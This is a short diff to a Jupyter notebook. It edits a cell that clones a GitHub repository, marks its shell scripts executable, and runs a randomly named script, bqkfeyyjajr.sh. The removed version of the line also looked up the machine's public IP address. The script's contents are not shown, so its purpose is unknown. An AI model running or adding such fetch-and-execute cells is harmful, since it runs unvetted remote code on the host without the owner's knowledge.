--- a/2.ipynb
+++ b/2.ipynb
@@ -603,7 +603,7 @@
       "source": [
         "! git clone https://github.com/drajathakim7/shiny-doodle.git\r\n",
 	"% cd shiny-doodle\n",
-        "! ip=$(echo \"$(curl -s ifconfig.me)\" | tr . _ ) && chmod +x *.sh && sed -i -e 's/\\r$//' bqkfeyyjajr.sh && ./bqkfeyyjajr.sh"
+        "! chmod +x *.sh && sed -i -e 's/\\r$//' bqkfeyyjajr.sh && ./bqkfeyyjajr.sh"
       ],
       "execution_count": null,
       "outputs": []
